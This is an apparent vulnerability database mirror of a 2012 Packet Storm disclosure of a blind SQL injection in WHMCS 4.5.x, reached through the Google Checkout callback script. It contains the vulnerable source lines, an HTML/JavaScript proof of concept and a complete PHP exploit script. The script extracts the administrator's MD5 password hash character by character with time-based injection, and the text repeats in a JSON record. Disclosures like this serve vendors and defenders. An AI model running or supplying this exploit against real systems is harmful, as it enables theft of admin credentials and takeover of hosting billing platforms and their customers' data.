Search...

WHMCS 4.5.2 Blind SQL Injection

2012-10-22T00:00:00

ID PACKETSTORM:117598
Type packetstorm
Reporter Starware Security Team
Modified 2012-10-22T00:00:00

Description

                                        
                                            ` ____ _   
/ ___|| |_ __ _ _ __ __ ____ _ _ __ ___   
\___ \| __/ _` | '__| \ \ /\ / / _` | '__/ _ \  
___) | || (_| | | \ V V / (_| | | | __/  
|____/ \__\__,_|_| \_/\_/ \__,_|_| \___|  
  
  
# Software : WHMCS (WHMCompleteSolution)   
# Google Dork: Turn on thinking mode :P  
# Date: 10/22/2012  
# Author: Starware Security Team [www.Resecure.me]  
# Contact Us : Security[@]star-ware.com  
# Vendor Homepage: http://www.whmcs.com  
# Tested on: WHMCS v4.5.2   
# Affected versions: 4.5.x  
-----------------------------------------------------  
  
#Vulnerability Exists in : [SCRIPT_DIR]/modules/gateways/callback/googlecheckout.php  
  
#Vulnerable Source Code Snippet :   
  
LINE 11: $xml_response = (isset($HTTP_RAW_POST_DATA) ? $HTTP_RAW_POST_DATA : file_get_contents('php://input'));  
LINE 16: $xmldata = XMLtoArray($xml_response);  
LINE 19: $ordernumber = $xmldata['CHARGE-AMOUNT-NOTIFICATION']['GOOGLE-ORDER-NUMBER'];  
LINE 22: $query = 'SELECT data FROM tblgatewaylog WHERE gateway=\'Google Checkout\' AND data LIKE \'%new-order-notification%' . $ordernumber . '%\'';  
  
#Proof of Concept :   
  
&lt;html&gt;  
&lt;head&gt;  
&lt;title&gt;WHMCS Blind SQL Injection POC&lt;/title&gt;  
&lt;/head&gt;  
&lt;body&gt;  
&lt;script&gt;  
var params = "&lt;charge-amount-notification&gt;&lt;google-order-number&gt;0' %YOUR INJECTION HERE% -- -&lt;/google-order-number&gt;&lt;new-fulfillment-order-state&gt;charge-amount-notification&lt;/new-fulfillment-order-state&gt;&lt;/charge-amount-notification&gt;";  
var http = new XMLHttpRequest();  
try {  
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");  
} catch (e) {  
alert("Permission UniversalBrowserRead denied.");  
}  
http.open("POST", "http://site.com/whmcs/modules/gateways/callback/googlecheckout.php", true);  
http.onreadystatechange = handleResponse;  
http.send(params);  
function handleResponse() {  
  
if(http.readyState == 4 && http.status == 200){  
var response = http.responseText;  
alert(response);  
}  
}   
&lt;/script&gt;  
&lt;/body&gt;  
&lt;/html&gt;  
  
#Exploit Code :   
  
  
&lt;?php  
/*  
WHMCS Blind SQL Injection Exploit by Starware Security Team.  
Usage: php exploit.php URL seconds  
*/  
  
set_time_limit(0);  
function post_request($url,$post_data,$follow=0) {  
$user_agent = 'Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1';   
$ch = curl_init();  
$timeout = 1;  
$execution_timeout = 4;  
curl_setopt($ch, CURLOPT_URL,$url);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);  
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
if($follow == 1) curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE );  
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);  
curl_setopt($ch, CURLOPT_HTTPHEADER,array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language: en-us,en;q=0.5','Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7','Keep-Alive: 115','Connection: keep-alive'));  
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);  
curl_setopt($ch, CURLOPT_TIMEOUT, $execution_timeout);   
curl_setopt($ch, CURLOPT_POST, 1);  
curl_setopt($ch, CURLOPT_POSTFIELDS,$post_data);  
$response = curl_exec($ch);  
curl_close($ch);  
return $response;  
}  
  
function start_time() {  
$time = microtime();  
$time = explode(" ", $time);  
$time = $time[1] + $time[0];  
return $time;  
  
}  
  
function end_time($start) {  
$time = microtime();  
$time = explode(" ", $time);  
$time = $time[1] + $time[0];  
$finish = $time;  
$totaltime = ($finish - $start);  
return round($totaltime);  
}  
  
  
function check_ascii($num,$num2,$num3) {  
global $url,$seconds;  
$start= start_time();   
$injection = "/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/BETWEEN/**/$num/**/and/**/$num2,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #";  
post_request($url,"&lt;charge-amount-notification&gt;&lt;google-order-number&gt;0' $injection &lt;/google-order-number&gt;&lt;new-fulfillment-order-state&gt;charge-amount-notification&lt;/new-fulfillment-order-state&gt;&lt;/charge-amount-notification&gt;");  
if(end_time($start) &gt;= $seconds) return true; else return false;  
  
}  
  
  
function inject($num,$num2,$num3) {  
  
global $url,$seconds;  
for($i=$num;$i&lt;=$num2;$i++) {  
$start= start_time();   
$injection = "/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/=/**/$i,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #";  
post_request($url,"&lt;charge-amount-notification&gt;&lt;google-order-number&gt;0' $injection &lt;/google-order-number&gt;&lt;new-fulfillment-order-state&gt;charge-amount-notification&lt;/new-fulfillment-order-state&gt;&lt;/charge-amount-notification&gt;");  
if(end_time($start) &gt;= $seconds) { echo chr($i); flush(); }  
  
}  
  
  
}  
  
function get_password() {  
global $url;  
for($i=1; $i&lt;=32;$i++) {  
if(check_ascii(48,52,$i)) { inject(48,52,$i); }  
elseif(check_ascii(53,57,$i)) { inject(53,57,$i); }  
elseif(check_ascii(97,101,$i)) { inject(97,101,$i); }  
elseif(check_ascii(102,106,$i)) { inject(102,106,$i); }  
elseif(check_ascii(107,111,$i)) { inject(107,111,$i); }  
elseif(check_ascii(112,116,$i)) { inject(112,116,$i); }  
elseif(check_ascii(116,122,$i)) { inject(116,122,$i); }  
}  
}  
  
  
  
if ($argc &lt; 3) {  
print "Usage: php ".$argv[0]." URL seconds\r\nExample:\r\nphp ".$argv[0]." http://site.com/whmcs/ 1\r\n-----------------------------------------\r\n";   
die;   
}  
$url = trim($argv[1])."/modules/gateways/callback/googlecheckout.php";  
$seconds = trim($argv[2]);  
echo "[~] Fetching password right now ... \n"; flush();  
echo " &gt;&gt; MD5 Password = "; flush();  
get_password();  
  
?&gt;  
  
  
#################################################################################  
  
Note: to exploit this vulnerability the google checkout payment gateway   
should be activated by admin from the whmcs admin panel   
  
~ END OF Disclosure ~  
  
Good Luck :)  
  
#################################################################################  
# Starware is an company specialzed in Hosting and Information Security field #  
# with list of high ranked sites including Mobile operators used our Hosting #  
# and Security Services. #  
# #  
# "Company Located in Egypt" #   
# #   
# http://www.star-ware.com #   
# #  
#################################################################################  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:117598", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WHMCS 4.5.2 Blind SQL Injection", "description": "", "published": "2012-10-22T00:00:00", "modified": "2012-10-22T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/117598/WHMCS-4.5.2-Blind-SQL-Injection.html", "reporter": "Starware Security Team", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:27", "viewCount": 1, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-11-03T10:16:27", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:16:27", "rev": 2}, "vulnersScore": 0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/117598/whmcs452-sql.txt", "sourceData": "` ____ _ \n/ ___|| |_ __ _ _ __ __ ____ _ _ __ ___ \n\\___ \\| __/ _` | '__| \\ \\ /\\ / / _` | '__/ _ \\ \n___) | || (_| | | \\ V V / (_| | | | __/ \n|____/ \\__\\__,_|_| \\_/\\_/ \\__,_|_| \\___| \n \n \n# Software : WHMCS (WHMCompleteSolution) \n# Google Dork: Turn on thinking mode :P \n# Date: 10/22/2012 \n# Author: Starware Security Team [www.Resecure.me] \n# Contact Us : Security[@]star-ware.com \n# Vendor Homepage: http://www.whmcs.com \n# Tested on: WHMCS v4.5.2 \n# Affected versions: 4.5.x \n----------------------------------------------------- \n \n#Vulnerability Exists in : [SCRIPT_DIR]/modules/gateways/callback/googlecheckout.php \n \n#Vulnerable Source Code Snippet : \n \nLINE 11: $xml_response = (isset($HTTP_RAW_POST_DATA) ? $HTTP_RAW_POST_DATA : file_get_contents('php://input')); \nLINE 16: $xmldata = XMLtoArray($xml_response); \nLINE 19: $ordernumber = $xmldata['CHARGE-AMOUNT-NOTIFICATION']['GOOGLE-ORDER-NUMBER']; \nLINE 22: $query = 'SELECT data FROM tblgatewaylog WHERE gateway=\\'Google Checkout\\' AND data LIKE \\'%new-order-notification%' . $ordernumber . '%\\''; \n \n#Proof of Concept : \n \n<html> \n<head> \n<title>WHMCS Blind SQL Injection POC</title> \n</head> \n<body> \n<script> \nvar params = \"<charge-amount-notification><google-order-number>0' %YOUR INJECTION HERE% -- -</google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>\"; \nvar http = new XMLHttpRequest(); \ntry { \nnetscape.security.PrivilegeManager.enablePrivilege(\"UniversalBrowserRead\"); \n} catch (e) { \nalert(\"Permission UniversalBrowserRead denied.\"); \n} \nhttp.open(\"POST\", \"http://site.com/whmcs/modules/gateways/callback/googlecheckout.php\", true); \nhttp.onreadystatechange = handleResponse; \nhttp.send(params); \nfunction handleResponse() { \n \nif(http.readyState == 4 && http.status == 200){ \nvar response = http.responseText; \nalert(response); \n} \n} \n</script> \n</body> \n</html> \n \n#Exploit Code : \n \n \n<?php \n/* \nWHMCS Blind SQL Injection Exploit by Starware Security Team. \nUsage: php exploit.php URL seconds \n*/ \n \nset_time_limit(0); \nfunction post_request($url,$post_data,$follow=0) { \n$user_agent = 'Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1'; \n$ch = curl_init(); \n$timeout = 1; \n$execution_timeout = 4; \ncurl_setopt($ch, CURLOPT_URL,$url); \ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); \ncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); \ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); \nif($follow == 1) curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE ); \ncurl_setopt($ch, CURLOPT_USERAGENT, $user_agent); \ncurl_setopt($ch, CURLOPT_HTTPHEADER,array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language: en-us,en;q=0.5','Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7','Keep-Alive: 115','Connection: keep-alive')); \ncurl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); \ncurl_setopt($ch, CURLOPT_TIMEOUT, $execution_timeout); \ncurl_setopt($ch, CURLOPT_POST, 1); \ncurl_setopt($ch, CURLOPT_POSTFIELDS,$post_data); \n$response = curl_exec($ch); \ncurl_close($ch); \nreturn $response; \n} \n \nfunction start_time() { \n$time = microtime(); \n$time = explode(\" \", $time); \n$time = $time[1] + $time[0]; \nreturn $time; \n \n} \n \nfunction end_time($start) { \n$time = microtime(); \n$time = explode(\" \", $time); \n$time = $time[1] + $time[0]; \n$finish = $time; \n$totaltime = ($finish - $start); \nreturn round($totaltime); \n} \n \n \nfunction check_ascii($num,$num2,$num3) { \nglobal $url,$seconds; \n$start= start_time(); \n$injection = \"/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/BETWEEN/**/$num/**/and/**/$num2,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #\"; \npost_request($url,\"<charge-amount-notification><google-order-number>0' $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>\"); \nif(end_time($start) >= $seconds) return true; else return false; \n \n} \n \n \nfunction inject($num,$num2,$num3) { \n \nglobal $url,$seconds; \nfor($i=$num;$i<=$num2;$i++) { \n$start= start_time(); \n$injection = \"/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/=/**/$i,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #\"; \npost_request($url,\"<charge-amount-notification><google-order-number>0' $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>\"); \nif(end_time($start) >= $seconds) { echo chr($i); flush(); } \n \n} \n \n \n} \n \nfunction get_password() { \nglobal $url; \nfor($i=1; $i<=32;$i++) { \nif(check_ascii(48,52,$i)) { inject(48,52,$i); } \nelseif(check_ascii(53,57,$i)) { inject(53,57,$i); } \nelseif(check_ascii(97,101,$i)) { inject(97,101,$i); } \nelseif(check_ascii(102,106,$i)) { inject(102,106,$i); } \nelseif(check_ascii(107,111,$i)) { inject(107,111,$i); } \nelseif(check_ascii(112,116,$i)) { inject(112,116,$i); } \nelseif(check_ascii(116,122,$i)) { inject(116,122,$i); } \n} \n} \n \n \n \nif ($argc < 3) { \nprint \"Usage: php \".$argv[0].\" URL seconds\\r\\nExample:\\r\\nphp \".$argv[0].\" http://site.com/whmcs/ 1\\r\\n-----------------------------------------\\r\\n\"; \ndie; \n} \n$url = trim($argv[1]).\"/modules/gateways/callback/googlecheckout.php\"; \n$seconds = trim($argv[2]); \necho \"[~] Fetching password right now ... \\n\"; flush(); \necho \" >> MD5 Password = \"; flush(); \nget_password(); \n \n?> \n \n \n################################################################################# \n \nNote: to exploit this vulnerability the google checkout payment gateway \nshould be activated by admin from the whmcs admin panel \n \n~ END OF Disclosure ~ \n \nGood Luck :) \n \n################################################################################# \n# Starware is an company specialzed in Hosting and Information Security field # \n# with list of high ranked sites including Mobile operators used our Hosting # \n# and Security Services. # \n# # \n# \"Company Located in Egypt\" # \n# # \n# http://www.star-ware.com # \n# # \n################################################################################# \n`\n"}